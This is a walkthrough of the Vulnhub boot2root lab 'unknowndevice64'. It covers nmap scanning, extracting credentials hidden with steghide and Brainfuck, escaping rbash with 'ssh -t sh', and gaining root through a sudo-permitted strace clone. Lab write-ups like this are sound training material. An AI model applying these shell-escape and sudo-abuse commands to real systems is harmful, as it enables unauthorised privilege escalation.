./s1gh.sh

Vulnhub: unknowndevice64

March 13, 2019 In Vulnhub | 10 min read

Info

Name: unknowndevice64: 1
Operating System: Linux
Url: https://www.vulnhub.com/entry/unknowndevice64-1,293/
Release: 9 Mar 2019
Difficulty: Intermediate(??)
Description: unknowndevice64 v1.0 is a medium level boot2root challenge. Follow your intuitions ... and enumerate!

Enumeration

As always, let's start with NMAP.

nmap -sC -sV -p- 192.168.1.116
Starting Nmap 7.70 ( https://nmap.org ) at 2019-03-13 21:17 CET
Nmap scan report for 192.168.1.116
Host is up (0.000066s latency).
Not shown: 65533 closed ports
PORT      STATE SERVICE VERSION
1337/tcp  open  ssh     OpenSSH 7.7 (protocol 2.0)
| ssh-hostkey: 
|   2048 b9:af:04:6d:f1:8c:59:3a:d6:e1:96:b7:f7:fc:57:83 (RSA)
|   256 12:68:4c:6b:96:1e:51:59:32:8a:3d:41:0d:55:6b:d2 (ECDSA)
|_  256 da:3e:28:52:30:72:7a:dd:c3:fb:89:7e:54:f4:bb:fb (ED25519)
31337/tcp open  http    SimpleHTTPServer 0.6 (Python 2.7.14)
|_http-title:    Website By Unknowndevice64   
MAC Address: 00:0C:29:12:74:FE (VMware)

Let's start with the web server.
Visiting the web server gives us the following page:

Nothing really interesting being displayed here.
Looking at the source code however, reveals something interesting.

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<body>
<title>   Website By Unknowndevice64   </title>  
<head> <meta http-equiv="Content-Type" content="text/html;charset=UTF-8"> <link href="" rel="icon" type="image/png"/> <link type="text/css" rel="stylesheet" href="http://fonts.googleapis.com/css?family=Share+Tech+Mono"> <link type="text/css" rel="stylesheet" href="http://fonts.googleapis.com/css?family=Geo"> 
<meta content="Website By Unknowndevice64 | ud64   name="description"/> 
<meta content="Website By Unknowndevice64 | ud64  name="keywords"/> 
<meta content="Website By Unknowndevice64 | ud64  name="Abstract"/> 
<meta name="Website By Unknowndevice64 | ud64"/>  
</head> 
<style type="text/css" media="all"> html,body{margin:0;padding:0;} #text-shadow-box{position:fixed;left:0;right:0;top:0;bottom:0;width:100%;height:100%;overflow:hidden;background:#ffffff;font-family:Stencil,Arial,sans-serif;-webkit-tap-highlight-color:rgba(0,0,0,0);-webkit-user-select:none;} #text-shadow-box #tsb-text,#text-shadow-box #tsb-link{position:absolute;top:49%;left:0;width:100%;height:1em;margin:-0.77em 0 0 0;font-size:70px;line-height:1em;font-weight:bold;text-align:center;} #text-shadow-box #tsb-text{font-size:100px;color:transparent;text-shadow:black 0px -45.2px 19px;} #text-shadow-box #tsb-link a{color:#FFF;text-decoration:none;} #text-shadow-box #tsb-box,#text-shadow-box #tsb-wall{position:absolute;top:50%;left:0;width:100%;height:60%;} #text-shadow-box #tsb-box{-webkit-box-shadow:black 0px -45.2px 39px;-moz-box-shadow:black 0px -45.2px 39px;} #text-shadow-box #tsb-wall{background:#ffffff;} #text-shadow-box #tsb-wall p{position:relative;font-size:15px;line-height:1.5em;text-align:justify;color:#222;width:550px;margin:1.5em auto;cursor:default;} #text-shadow-box #tsb-wall p a{color:#fff;} #text-shadow-box #tsb-wall p a:hover{text-decoration:none;color:#000;background:#fff;} #tsb-spot{position:absolute;top:-50%;left:-50%;width:200%;height:200%;pointer-events:none;background:-webkit-gradient(radial,center center,0,center center,450,from(rgba(0,0,0,0)),to(rgba(0,0,0,1)));background:-moz-radial-gradient(center 45deg,circle closest-side,transparent 0,black 450px);} #blue{color:#0062ff;} </style> <!--    [if IE]> 

<style type="text/css"> /* Sadly no IE9 support for pointer-events: none; nor CSS2 text-shadow */ #tsb-spot {     display: none; } #tsb-ie {     position: absolute;     top: -90%;     left: -50%;     width: 200%;     height: 334%;     background: url(data:image/svg+xml;base64,PD94bWwgdmVyc2lvbj0iMS4wIiA/Pgo8c3ZnIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgd2lkdGg9IjEwMCUiIGhlaWdodD0iMTAwJSIgdmlld0JveD0iMCAwIDEgMSIgcHJlc2VydmVBc3BlY3RSYXRpbz0ibm9uZSI+CiAgPHJhZGlhbEdyYWRpZW50IGlkPSJncmFkLXVjZ2ctZ2VuZXJhdGVkIiBncmFkaWVudFVuaXRzPSJ1c2VyU3BhY2VPblVzZSIgY3g9IjUwJSIgY3k9IjUwJSIgcj0iNzUlIj4KICAgIDxzdG9wIG9mZnNldD0iMCUiIHN0b3AtY29sb3I9IiMwMDAwMDAiIHN0b3Atb3BhY2l0eT0iMCIvPgogICAgPHN0b3Agb2Zmc2V0PSI3NCUiIHN0b3AtY29sb3I9IiMwMDAwMDAiIHN0b3Atb3BhY2l0eT0iMSIvPgogICAgPHN0b3Agb2Zmc2V0PSIxMDAlIiBzdG9wLWNvbG9yPSIjMDAwMDAwIiBzdG9wLW9wYWNpdHk9IjEiLz4KICA8L3JhZGlhbEdyYWRpZW50PgogIDxyZWN0IHg9Ii01MCIgeT0iLTUwIiB3aWR0aD0iMTAxIiBoZWlnaHQ9IjEwMSIgZmlsbD0idXJsKCNncmFkLXVjZ2ctZ2VuZXJhdGVkKSIgLz4KPC9zdmc+); } </style> 
<![endif]    --> </center>  <div id="text-shadow-box">      <div style="box-shadow: 0px 75.2px 57px black;" id="tsb-box">         </div></center>       <p style="text-shadow: -112.8px 75.2px 37px black;" id="tsb-text">ud64</p>       <p id="tsb-link">      
<a href="#" target="_blank">ud64</a>    </p>       <div id="tsb-wall">           <div id="tsb-ie">             </div>           <p>             </p>           <center> <img src="ud64.gif" width="200" height="200"> <h4>“Not a visible enthusiasm but a <span style="color:red">h1dd3n</span> one, an excitement burning with a cold flame.” </h4> <h2></h2> <h2>Thanks to: ./AjayVerma (AKA unknowndevice64)</h2> <h5>2018</h5>  </center>
<div id="ttecleado" ?="">                                  <table>                       <tbody>                           <tr>                               <td colspan="2">                                                                    </td>                               <td colspan="2">                                 </td>                             </tr>                           <tr>                             </tr>                         </tbody>                     </table>                 </center>             </div><br />    </div><span style="color: rgb(0, 98, 255); font-family: Tahoma; font-size: 18px;"><strong></strong></span>    <div style="background-position: 282px -284px;" id="tsb-spot">         </div><span style="color: rgb(0, 98, 255); font-family: Tahoma; font-size: 18px;"><strong></strong></span> </div>   <script type="text/javascript" language="javascript" charset="utf-8"> /**  *   *   * just happy (^_^)  *  * Power . . . of Shadows . . .  */ var text = null; var spot = null; var box = null; var boxProperty = ''; init(); function init() {     text = document.getElementById('tsb-text');     spot = document.getElementById('tsb-spot');     box = document.getElementById('tsb-box');     if (typeof box.style.webkitBoxShadow == 'string') {         boxProperty = 'webkitBoxShadow';     } else if (typeof box.style.MozBoxShadow == 'string') {         boxProperty = 'MozBoxShadow';     } else if (typeof box.style.boxShadow == 'string') {         boxProperty = 'boxShadow';     }     if (text && spot && box) {         document.getElementById('text-shadow-box').onmousemove = onMouseMove;         document.getElementById('text-shadow-box').ontouchmove = function (e) {e.preventDefault(); e.stopPropagation(); onMouseMove({clientX: e.touches[0].clientX, clientY: e.touches[0].clientY});};     } } function onMouseMove(e) {     if (typeof e === 'undefined' || typeof e.clientX === 'undefined') {         return;     }     var xm = (e.clientX - Math.floor(window.innerWidth / 2)) * 0.4;     var ym = (e.clientY - Math.floor(window.innerHeight / 3)) * 0.4;     var d = Math.round(Math.sqrt(xm*xm + ym*ym) / 5);     text.style.textShadow = -xm + 'px ' + -ym + 'px ' + (d + 10) + 'px black';     if (boxProperty) {         box.style[boxProperty] = '0 ' + -ym + 'px ' + (d + 30) + 'px black';     }     xm = e.clientX - Math.floor(window.innerWidth / 2);     ym = e.clientY - Math.floor(window.innerHeight / 2);     spot.style.backgroundPosition = xm + 'px ' + ym + 'px'; } </script> /*   <p>     </p> <center>   <div align="center">  #outerCircleText { /* Optional - DO NOT SET FONT-SIZE HERE, SET IT IN THE SCRIPT */ font-style: Electrofied; font-weight: bold; font-family: 'Electrofied', Electrofied, Electrofied; color: white; /* End Optional */  /* Start Required - Do Not Edit */ position: absolute;top: 0;left: 0;z-index: 3000;cursor: default;} #outerCircleText div {position: relative;} #outerCircleText div div {position: absolute;top: 0;left: 0;text-align: center;} /* End Required */ /* End Circle Text Styles */ </style>   </center> </body></span><br />
          <br />
          <p class="para" align="left"><p>Website By Unknowndevice64</p>
<!-- key_is_h1dd3n.jpg -->
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>./Ajay Verma &nbsp;</p></p>
                
        </div>

            
            </div>
            
</head>

</body>

</html>

Downloading key_is_h1dd3n.jpg gives us the following image:

Exiftool gives us nothing interesting:

exiftool key_is_h1dd3n.jpg 
ExifTool Version Number         : 11.16
File Name                       : key_is_h1dd3n.jpg
Directory                       : .
File Size                       : 5.3 kB
File Modification Date/Time     : 2018:12:31 07:25:55+01:00
File Access Date/Time           : 2019:03:13 20:35:00+01:00
File Inode Change Date/Time     : 2019:03:13 20:34:56+01:00
File Permissions                : rw-r--r--
File Type                       : JPEG
File Type Extension             : jpg
MIME Type                       : image/jpeg
JFIF Version                    : 1.01
Resolution Unit                 : None
X Resolution                    : 1
Y Resolution                    : 1
Image Width                     : 300
Image Height                    : 300
Encoding Process                : Baseline DCT, Huffman coding
Bits Per Sample                 : 8
Color Components                : 1
Image Size                      : 300x300
Megapixels                      : 0.090

Same with binwalk:

binwalk key_is_h1dd3n.jpg 

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
0             0x0             JPEG image data, JFIF standard 1.01

But running steghide against the image prompts us for a password!

steghide extract -sf key_is_h1dd3n.jpg 
Enter passphrase: 
steghide: could not extract any data with that passphrase!

Guessing the password is really simple. Especially since the password is in the filename: h1dd3n.

steghide extract -sf key_is_h1dd3n.jpg 
Enter passphrase: 
wrote extracted data to "h1dd3n.txt".

Printing the contents of h1dd3n.txt:

++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>>>+++++++++++++++++.----------------
-.<----------------.--.++++++.---------.>-----------------------.<<+++.++.>+++++
.--.++++++++++++.>++++++++++++++++++++++++++++++++++++++++.-----------------.

This is the programming language Brainfuck.

We can use the online compiler copy.sh/brainfuck to actually run this program:

Awesome! That looks like a username/password combination.
Let's try and SSH into the box.

Initial Foothold

root@kali:~# ssh ud64@192.168.1.116 -p 1337
ud64@192.168.1.116's password: 
Last login: Wed Mar 13 21:39:33 2019 from 192.168.1.115
ud64@unknowndevice64_v1:~$ ls -la
-rbash: /bin/ls: restricted: cannot specify `/' in command names
ud64@unknowndevice64_v1:~$

Okay, so we're stuck in rbash. Great.
Before moving on to the privesc part, we need to break out of jail.

What if we use the -t parameter with the ssh command? To maybe, spawn us a shell before we are jailed by rbash?

From the man pages:

-t Force pseudo-terminal allocation. This can be used to execute arbitrary screen-based programs on a remote machine, which can be very use‐
ful, e.g. when implementing menu services. Multiple -t options force tty allocation, even if ssh has no local tty.

root@kali:~# ssh ud64@192.168.1.116 -p 1337 -t sh
ud64@192.168.1.116's password: 
sh-4.4$ ls -la
total 64
drwxr-xr-x 12 ud64 ud64 4096 Dec 31 08:51 .
drwxr-xr-x  6 root root 4096 Dec 31 06:52 ..
-rw-------  1 ud64 ud64 1028 Mar 13 21:42 .bash_history
-rw-------  1 ud64 ud64  108 Dec 31 07:09 .bash_profile
drwx------  2 ud64 ud64 4096 Dec 31 07:22 .config
-rw-r--r--  1 ud64 ud64 3729 Oct 23  2017 .screenrc
drwxr-xr-x  2 ud64 ud64 4096 Dec 31 07:22 Desktop
drwxr-xr-x  2 ud64 ud64 4096 Dec 31 07:22 Documents
drwxr-xr-x  2 ud64 ud64 4096 Dec 31 07:22 Downloads
drwxr-xr-x  2 ud64 ud64 4096 Dec 31 07:22 Music
drwxr-xr-x  2 ud64 ud64 4096 Dec 31 07:22 Pictures
drwxr-xr-x  2 ud64 ud64 4096 Dec 31 07:22 Public
drwxr-xr-x  2 ud64 ud64 4096 Dec 31 07:22 Videos
drwxr-xr-x  2 ud64 ud64 4096 Dec 31 08:40 prog
drwxr-xr-x  2 ud64 ud64 4096 Dec 31 08:56 web
sh-4.4$ echo #FUCK YOU, rbash

Privilege Escalation

Always, I mean always go for the low hanging fruit first.
By that I mean, always check the simplest things before starting some deep enumeration process.

sh-4.4$ sudo -l
User ud64 may run the following commands on unknowndevice64_v1:
    (ALL) NOPASSWD: /usr/bin/sysud64

Okay, so we can run a program called sysud64... Let's first run the program and see what we can do with it.

sh-4.4$ sudo /usr/bin/sysud64
/usr/bin/sysud64: must have PROG [ARGS] or -p PID
Try '/usr/bin/sysud64 -h' for more information.

Ehm, I have seen that output before.
Is sysud64 the same program as strace? If so we can easily get a root shell!

sh-4.4$ md5sum /usr/bin/sysud64
d8d774ed8ee9907338ca152454a3e435  /usr/bin/sysud64
sh-4.4$ md5sum /usr/bin/strace
d8d774ed8ee9907338ca152454a3e435  /usr/bin/strace
Why Huh GIF from Why GIFs

Well then, let's get a root shell, shall we?

By using the following command we can drop to a shell using the regular strace:

sudo strace -o /dev/null /bin/sh

And since strace == sysud64 we can now get a root shell:

sh-4.4$ sudo /usr/bin/sysud64 -o /dev/null /bin/sh
sh-4.4# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
sh-4.4#
sh-4.4# cat /root/flag.txt
  ___    _                _
 / _ \  | |              | |
/ /_\ \ | |__   __ _  ___| | _____ _ __
|  _  | | '_ \ / _` |/ __| |/ / _ \ '__|
| | | | | | | | (_| | (__|   <  __/ |
\_| |_/ |_| |_|\__,_|\___|_|\_\___|_|


     _                    __             _
    | |                  / _|           | |
  __| | ___   ___  ___  | |_ ___  _ __  | | _____   _____
 / _` |/ _ \ / _ \/ __| |  _/ _ \| '__| | |/ _ \ \ / / _ \
| (_| | (_) |  __/\__ \ | || (_) | |    | | (_) \ V /  __/
 \__,_|\___/ \___||___/ |_| \___/|_|    |_|\___/ \_/ \___|


          _           _           _   _
         | |         | |         | | | |
__      _| |__   __ _| |_    ___ | |_| |__   ___ _ __ ___
\ \ /\ / / '_ \ / _` | __|  / _ \| __| '_ \ / _ \ '__/ __|
 \ V  V /| | | | (_| | |_  | (_) | |_| | | |  __/ |  \__ \
  \_/\_/ |_| |_|\__,_|\__|  \___/ \__|_| |_|\___|_|  |___/


                     _     _               _         _
                    | |   | |             | |       | |
__      _____  _   _| | __| |  _ __   ___ | |_    __| | ___
\ \ /\ / / _ \| | | | |/ _` | | '_ \ / _ \| __|  / _` |/ _ \
 \ V  V / (_) | |_| | | (_| | | | | | (_) | |_  | (_| | (_) |
  \_/\_/ \___/ \__,_|_|\__,_| |_| |_|\___/ \__|  \__,_|\___/


  __
 / _|
| |_ ___  _ __   _ __ ___   ___  _ __   ___ _   _
|  _/ _ \| '__| | '_ ` _ \ / _ \| '_ \ / _ \ | | |
| || (_) | |    | | | | | | (_) | | | |  __/ |_| |_
|_| \___/|_|    |_| |_| |_|\___/|_| |_|\___|\__, (_)
                                             __/ |
                                            |___/



   _   _   _   _   _   _   _   _   _   _   _   _   _   _   _   _   _
  / \ / \ / \ / \ / \ / \ / \ / \ / \ / \ / \ / \ / \ / \ / \ / \ / \
 ( . | / | u | n | k | n | o | w | n | d | e | v | i | c | e | 6 | 4 )
  \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/

Glitter Surprise GIF from Glitter GIFs

Further Reading

https://en.wikipedia.org/wiki/Brainfuck

https://gtfobins.github.io/

https://speakerdeck.com/knaps/escape-from-shellcatraz-breaking-out-of-restricted-unix-shells

https://fireshellsecurity.team/restricted-linux-shell-escaping-techniques/